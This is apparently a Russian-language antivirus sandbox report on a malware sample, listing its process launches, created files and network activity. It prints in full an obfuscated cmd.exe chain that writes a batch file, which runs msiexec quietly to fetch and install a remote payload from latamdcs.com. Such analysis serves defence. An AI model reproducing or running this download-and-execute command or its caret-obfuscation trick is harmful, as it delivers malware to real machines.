Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^latamdcs.com^/giftcard.^php ">>%temp%\alp...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\alpaca.bat
- %TEMP%\954507.cvr
Сетевая активность
Подключается к
- 'la###dcs.com':80
- 'la###dcs.com':443
TCP
Запросы HTTP GET
- http://la###dcs.com/giftcard.php
Другие
- 'la###dcs.com':443
UDP
- DNS ASK la###dcs.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^latamdcs.com^/giftcard.^php ">>%temp%\alp...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" EChO"
- '<SYSTEM32>\cmd.exe' /S /D /c" SEt /p=" M^siexe" 1>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="c " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="^/i" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" http^:^/^/^latamdcs.com^/giftcard.^php " 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p=" ^/q &exit" 1>>%TEMP%\alpaca.bat"
- '<SYSTEM32>\msiexec.exe' /ihttp://latamdcs.com/giftcard.php /q
